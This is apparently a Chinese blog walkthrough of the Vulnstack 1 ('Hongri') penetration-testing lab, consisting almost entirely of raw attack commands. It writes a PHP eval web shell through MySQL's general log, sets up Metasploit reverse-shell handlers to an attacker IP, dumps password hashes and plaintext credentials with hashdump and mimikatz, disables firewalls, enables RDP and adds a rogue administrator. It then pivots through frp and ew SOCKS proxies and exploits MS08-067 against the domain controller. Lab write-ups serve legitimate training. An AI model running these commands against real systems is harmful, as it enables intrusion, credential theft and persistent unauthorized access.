一、获取shell

红日靶机一

show variables  like  '%general%'; #查看日志状态

红日靶机一

当开启general时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。SET GLOBAL general_log='on'

红日靶机一

SHOW VARIABLES LIKE '%secure%'

红日靶机一

SET GLOBAL general_log_file='C:/phpStudy/www/test1.php'          改变日志生成的地址

红日靶机一

写入一句话

SELECT'<?php eval($_POST["cmd"]);?>'

红日靶机一

cs上线

红日靶机一
红日靶机一

shell ipconfig

红日靶机一
红日靶机一

shell systeminfo

红日靶机一

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.44.129

lhost => 192.168.44.129

msf exploit(handler) > set lport 2222

lport =>2222msf exploit(handler) > exploit

红日靶机一
红日靶机一

getsystem提权成功

红日靶机一

迁移进程

红日靶机一
红日靶机一

关闭防火墙

netsh firewall set opmode disable

红日靶机一

获取密码
run hashdump

红日靶机一

load mimikatz

红日靶机一

wdigest

红日靶机一

直接cs

红日靶机一
红日靶机一

netsh advfirewall set allprofiles state off

关墙

进行远程登录

开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

红日靶机一

添加管理员账号

net user username password /add

net localgroup administrators username /add

net user bienao 123.com /add

net localgroup administrators bienao /add

红日靶机一

65001 UTF-8代码页 解决乱码

chcp 65001

红日靶机一

远程连接
rdesktop 192.168.44.128:3389

红日靶机一
红日靶机一

探测域内存活主机
run windows/gather/enum_ad_computers

添加路由

run autoroute -s 192.168.52.0/24

run autoroute -p

红日靶机一

信息收集

红日靶机一
红日靶机一

判断域控

shell net view /domain

shell net time /domain

红日靶机一

执行探测

for /L %i IN (1,1,254) DO ping -w 2 -n 1 192.168.52.%i

红日靶机一

arp -a  主机探测

红日靶机一

nmap --script=vuln 192.168.52.141

红日靶机一

nmap --script=vuln 192.168.52.138

frp 创建反向socks代理

修改frps.ini文件

vim frps.ini

红日靶机一

启动frp

./frps -c frps.ini

红日靶机一
红日靶机一

frpc.exe -c frpc.ini

红日靶机一

或者(ip不一样)

ew 创建反向socks代理

Kali: ./ew_for_linux64 -s rcsocks -l 1080 -e 1024

这条命令的意思是说让公网服务器监听1080和1024端口,等待攻击者机器访问1080端口,目标机器访问1024端口

windows: .\ew_for_Win.exe -s rssocks -d 192.168.255.132 -e 1024

红日靶机一
红日靶机一

proxychains代理

vi /etc/proxychains.conf

红日靶机一

msf5 exploit(multi/handler) > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.52.141

rhosts => 192.168.52.141

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf5 exploit(windows/smb/ms08_067_netapi) > run

红日靶机一

net user bienao 123.com /add  

net localgroup administrators bienao /add

netsh advfirewall set allprofiles state off  关墙

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f    开3389

红日靶机一

远程连接

rdesktop 192.168.44.141:3389

远程失败

getuid

run hashdump

红日靶机一

wdigest #获取系统账户信息

load mimikatz  #加载mimikatz

kerberos #获取明文

红日靶机一

域控弹回CS

meterpreter > background

[*] Backgrounding session 2...

msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/multi/handler

msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject

msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf5 exploit(windows/local/payload_inject) > set lhost 192.168.44.129

lhost => 192.168.44.129

msf5 exploit(windows/local/payload_inject) > set lport 1111

lport => 1111

msf5 exploit(windows/local/payload_inject) > set session 2

session => 2

msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true

disablepayloadhandler => true

msf5 exploit(windows/local/payload_inject) > run

红日靶机一

参考学习

https://blog.csdn.net/qq_42349134/article/details/103135062

https://www.cooyf.com/bj/vulnstack1.html#0x04%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F

相关文章:

  • 2021-10-29
  • 2022-12-23
  • 2022-12-23
  • 2022-01-06
  • 2021-04-12
  • 2022-12-23
  • 2022-12-23
  • 2021-11-19
猜你喜欢
  • 2022-01-30
  • 2021-06-22
  • 2022-02-16
  • 2021-10-26
  • 2021-07-10
  • 2021-09-02
  • 2022-12-23
相关资源
相似解决方案